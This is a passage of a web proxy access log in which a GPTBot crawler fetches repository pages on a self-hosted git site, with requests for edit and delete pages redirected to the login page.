2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:16:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app" +[17/Feb/2026:16:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:16:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211237] [Gzip 18.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:16:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11893] [Gzip 3.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx-reverse-proxy.conf" +[17/Feb/2026:16:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 48497] [Gzip 12.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 28729] [Gzip 9.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 97595] [Gzip 18.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 10392] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10216] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" +[17/Feb/2026:16:43:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" +[17/Feb/2026:16:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_upload/main/asset_pilot_docker/static" +[17/Feb/2026:16:43:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" +[17/Feb/2026:16:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/static" +[17/Feb/2026:16:43:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:16:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:16:43:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:16:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:16:43:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:43:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:43:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:43:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:43:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:43:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:43:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/static" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static" +[17/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/static" +[17/Feb/2026:16:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10056] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js" +[17/Feb/2026:16:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 9836] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:43:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 11558] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 12174] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 11472] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:43:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService" [Client 74.7.227.38] [Length 9813] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 11479] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 11753] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:16:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 11495] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService" +[17/Feb/2026:16:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 9827] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj" [Client 74.7.227.38] [Length 9821] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj" +[17/Feb/2026:16:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 10657] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 9827] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 11436] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 915] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 917] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 588] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 10898] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/TestService.csproj" +[17/Feb/2026:16:43:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/TestService.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] 